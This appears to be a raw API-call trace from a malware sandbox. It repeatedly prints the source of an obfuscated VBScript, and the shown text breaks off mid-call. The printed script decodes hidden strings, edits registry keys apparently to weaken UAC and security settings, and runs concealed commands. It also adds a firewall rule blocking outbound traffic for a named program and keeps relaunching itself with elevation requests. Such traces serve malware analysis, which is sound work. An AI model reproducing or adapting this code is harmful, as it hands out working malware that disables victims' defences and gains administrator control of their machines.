bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.294] wcsncmp (_String1=" = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.294] wcsncmp (_String1="= \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.294] wcsncmp (_String1=" \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.294] wcsncmp (_String1="\"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 